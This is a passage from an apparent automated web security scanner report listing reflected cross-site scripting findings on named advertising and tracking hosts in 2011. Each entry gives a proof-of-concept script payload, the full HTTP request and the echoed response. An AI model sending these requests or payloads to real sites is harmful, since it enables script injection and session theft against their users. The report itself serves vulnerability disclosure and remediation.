The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload d5d70<script>alert(1)</script>e85dc046e5c was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=d5d70<script>alert(1)</script>e85dc046e5c&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:52 GMT
Date: Sun, 02 Oct 2011 23:52:52 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"d5d70<script>alert(1)</script>e85dc046e5c", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


4.44. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 24b3b<script>alert(1)</script>279d6872fb9 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=24b3b<script>alert(1)</script>279d6872fb9&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:52 GMT
Date: Sun, 02 Oct 2011 23:52:52 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"24b3b<script>alert(1)</script>279d6872fb9", c6:"", c10:"", c15:"", c16:"", r:""});


4.45. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 6e3ec<script>alert(1)</script>d0298376d15 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=&c6=6e3ec<script>alert(1)</script>d0298376d15&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:53 GMT
Date: Sun, 02 Oct 2011 23:52:53 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"", c6:"6e3ec<script>alert(1)</script>d0298376d15", c10:"", c15:"", c16:"", r:""});


4.46. http://bid.openx.net/json [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload a5007<script>alert(1)</script>25b039ed36e was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_23202976328a5007<script>alert(1)</script>25b039ed36e&pid=c8eddb4a-d9d5-0c5b-6e12-562295aa26ea&s=728x90&f=1.3&url=http%3A%2F%2Fwww.goal.com%2Fen%2Fteams%2Fengland%2F97%2Fman-utd-news&cid=oxpv1%3A34-632-1929-2254-6393&hrid=77e73cd01694ae3edcb772febdf4acd1-1317599425 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1317129774; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache

OXM_23202976328a5007<script>alert(1)</script>25b039ed36e({"r":null});
4.47. http://d.tradex.openx.com/afr.php [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the cb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca534</script><script>alert(1)</script>a6853b22006 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HEREca534</script><script>alert(1)</script>a6853b22006 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:54:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%5D%5D%3E%3E; expires=Mon, 01-Oct-2012 23:54:23 GMT; path=/
Content-Length: 2791
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HEREca534</script><script>alert(1)</script>a6853b22006&loc=")', 40000);
// ]]>
...[SNIP]...
4.48. http://d.tradex.openx.com/afr.php [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55a13</script><script>alert(1)</script>3f8ba84e66c was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=55a13</script><script>alert(1)</script>3f8ba84e66c HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0; __utma=20948333.858847159.1317599444.1317599444.1317599444.1; __utmb=20948333.6.6.1317599444; __utmc=20948333; __utmz=20948333.1317599444.1.1.utmcsr=goal.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/teams/england/97/man-utd-news; __qca=P0-1745582797-1317599446738; __csref=http%3A%2F%2Fwww.goal.com%2Fen%2Fteams%2Fengland%2F97%2Fman-utd-news

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%27; expires=Mon, 01-Oct-2012 23:57:23 GMT; path=/
Content-Length: 3019
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=55a13</script><script>alert(1)</script>3f8ba84e66c")', 40000);
// ]]>
...[SNIP]...
4.49. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5849</script><script>alert(1)</script>2ba89ba78d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&c5849</script><script>alert(1)</script>2ba89ba78d=1 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:55:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%27; expires=Mon, 01-Oct-2012 23:55:30 GMT; path=/
Content-Length: 2795
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&c5849</script><script>alert(1)</script>2ba89ba78d=1&loc=")', 40000);
// ]]>
...[SNIP]...
4.50. http://d.tradex.openx.com/afr.php [zoneid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the zoneid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 713c9</script><script>alert(1)</script>3b14e1cb0e2 was submitted in the zoneid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=6511713c9</script><script>alert(1)</script>3b14e1cb0e2&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%5D%5D%3E%3E; expires=Mon, 01-Oct-2012 23:53:21 GMT; path=/
Content-Length: 853
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511713c9</script><script>alert(1)</script>3b14e1cb0e2&cb=INSERT_RANDOM_NUMBER_HERE&loc=")', 40000);
// ]]>
...[SNIP]...
4.51. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4765"%3balert(1)//842209825e9 was submitted in the mid parameter. This input was echoed as a4765";alert(1)//842209825e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=1a4765"%3balert(1)//842209825e9&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:04 GMT
Server: Apache
Set-Cookie: JSESSIONID=9AE5B1EE946FD6F0C0A430487526B06D.p0529; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.63
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4620

function Miwe1a4765";alert(1)//842209825e9() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/cl
...[SNIP]...
       },
       search: {
           type: "JS_OBJECT",
           uid: "9484261c-5e39-4ffd-a8b2-5f3e43a6e87f"
       }
   }
}
Miwe1a4765";alert(1)//842209825e9.prototype.getParts = function() {
return this.parts;
}
Miwe1a4765";alert(1)//842209825e9.prototype.getPart = function(id) {
return this.parts[id];
}
window["miwe1a4765";alert(1)//842209825e9"] = new Miwe1a4765";alert(1)//842209825e9();

4.52. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The value of the mid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e7d70%3balert(1)//b2842205c0b was submitted in the mid parameter. This input was echoed as e7d70;alert(1)//b2842205c0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=1e7d70%3balert(1)//b2842205c0b&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:05 GMT
Server: Apache
Set-Cookie: JSESSIONID=F5E192AC799744E1978CC2777215B349.p0523; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.57
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4615

function Miwe1e7d70;alert(1)//b2842205c0b() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/clk;141652382;20702477;a?http://www.orbitz.co
...[SNIP]...
4.53. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Issue detail

The value of the mid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ffe58%3balert(1)//d4209f9fb72 was submitted in the mid parameter. This input was echoed as ffe58;alert(1)//d4209f9fb72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf?mid=0ffe58%3balert(1)//d4209f9fb72&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&travelers=1&destination=BOS&dateDisplayFormat=mm/dd/yyyy&departureDate=yyyymmdd& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=DC3EB887B493EAE1352D240AB8EE0CBC.p0521; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.55
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5159

function Miwe0ffe58;alert(1)//d4209f9fb72() {
   this.parts = {
       content: {
           type: "HTML",
           data: DrfEncoder.decode("DQoNCjxkaXYgaWQ9ImRyZl9wb3B1bmRlckhQVSI+DQoJPGRpdiBjbGFzcz0id2lkZ2V0SGVhZGVyIj4NCgkJPHA+RmluZCBDaGVhcDwvcD4NCgkJPHA+SG
...[SNIP]...
4.54. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98c61"%3balert(1)//bb08c81a782 was submitted in the mid parameter. This input was echoed as 98c61";alert(1)//bb08c81a782 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf?mid=098c61"%3balert(1)//bb08c81a782&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&travelers=1&destination=BOS&dateDisplayFormat=mm/dd/yyyy&departureDate=yyyymmdd& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=8F129309865236AA29C043EFCB3D41D2.p0524; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.58
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5164

function Miwe098c61";alert(1)//bb08c81a782() {
   this.parts = {
       content: {
           type: "HTML",
           data: DrfEncoder.decode("DQoNCjxkaXYgaWQ9ImRyZl9wb3B1bmRlckhQVSI+DQoJPGRpdiBjbGFzcz0id2lkZ2V0SGVhZGV
...[SNIP]...
opping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js"
       }
   }
}
Miwe098c61";alert(1)//bb08c81a782.prototype.getParts = function() {
return this.parts;
}
